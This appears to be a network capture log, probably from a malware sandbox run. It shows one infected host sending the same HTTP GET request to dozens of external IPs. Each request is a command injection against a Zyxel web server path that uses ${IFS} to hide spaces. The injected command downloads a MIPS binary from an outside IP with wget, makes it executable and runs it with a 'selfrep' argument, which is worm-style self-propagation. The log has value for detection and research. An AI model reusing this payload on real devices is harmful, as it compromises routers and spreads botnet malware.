                                                Jan 12, 2024 18:24:48.152139902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7561192.168.2.1337130161.182.113.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.152193069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7562192.168.2.1337104200.110.24.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.152255058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7563192.168.2.1341398171.10.133.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.152286053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7564192.168.2.135096636.252.223.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.152323961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7565192.168.2.134691447.192.12.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.152367115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7566192.168.2.133845275.125.194.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.152405977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7567192.168.2.135632820.238.81.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.152441025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7568192.168.2.1333206147.36.31.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.152483940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7569192.168.2.1340746145.146.80.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.152534008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7570192.168.2.135989865.63.208.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.152559042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7571192.168.2.135642874.16.157.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.152586937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7572192.168.2.1340754170.208.77.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.152647972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7573192.168.2.1335508193.217.166.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.152693033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7574192.168.2.133582639.206.155.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.152704954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7575192.168.2.1348356196.48.97.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.152760983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7576192.168.2.135968057.218.186.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.152817011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7577192.168.2.1355088129.144.85.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.152858973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7578192.168.2.13520069.12.151.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.152892113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7579192.168.2.1345276180.87.76.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.152946949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7580192.168.2.134156660.177.199.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.152997017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7581192.168.2.133281661.19.206.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.153037071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7582192.168.2.1337860187.29.191.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.153074026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7583192.168.2.134557096.146.13.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.153103113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7584192.168.2.1343308138.240.163.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.153155088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7585192.168.2.134561812.18.202.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.153183937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7586192.168.2.1360126159.210.188.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.153229952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7587192.168.2.134955673.86.67.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.153249979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7588192.168.2.1337950102.217.233.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.153307915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7589192.168.2.133293450.136.86.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.153342009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7590192.168.2.134678068.155.252.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.153407097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7591192.168.2.1337274104.161.77.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.153449059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7592192.168.2.134257050.170.243.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.153479099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7593192.168.2.134073688.197.220.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.153546095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7594192.168.2.1358788158.1.201.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.153588057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7595192.168.2.134819898.224.212.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.153626919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7596192.168.2.134552096.0.175.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.153656960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7597192.168.2.1348784175.120.90.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.153698921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7598192.168.2.1345342216.88.118.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.153732061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7599192.168.2.13545969.117.96.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.153780937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7600192.168.2.133788892.113.5.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.153825998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7601192.168.2.1346130161.62.83.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.153851986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7602192.168.2.1357736208.129.127.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.153898954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7603192.168.2.134057454.101.94.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.153949976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7604192.168.2.1350460184.152.44.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.153980017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7605192.168.2.135675061.71.243.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.153996944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7606192.168.2.1348528156.190.146.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.154047966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7607192.168.2.134265080.221.72.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.154078960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7608192.168.2.1341580128.18.40.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.154119968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7609192.168.2.1355072161.96.220.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.154160976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7610192.168.2.1351384176.96.41.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.154191971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7611192.168.2.1353738147.190.93.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.154268980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7612192.168.2.13604261.227.215.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.154292107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7613192.168.2.133733296.176.231.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.154320002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7614192.168.2.1354114143.192.127.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.154376030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7615192.168.2.1357924148.181.23.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.154413939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7616192.168.2.1341144194.152.65.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.154458046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7617192.168.2.1352468175.183.194.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.154514074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7618192.168.2.1342070106.86.40.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.154551983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7619192.168.2.1338242166.48.60.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.154608011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7620192.168.2.1343822201.219.98.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.154623032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7621192.168.2.135382272.196.147.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.154664040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7622192.168.2.1345296100.246.164.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.154706955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7623192.168.2.1337024109.87.24.19443
                                                TimestampBytes transferredDirectionData
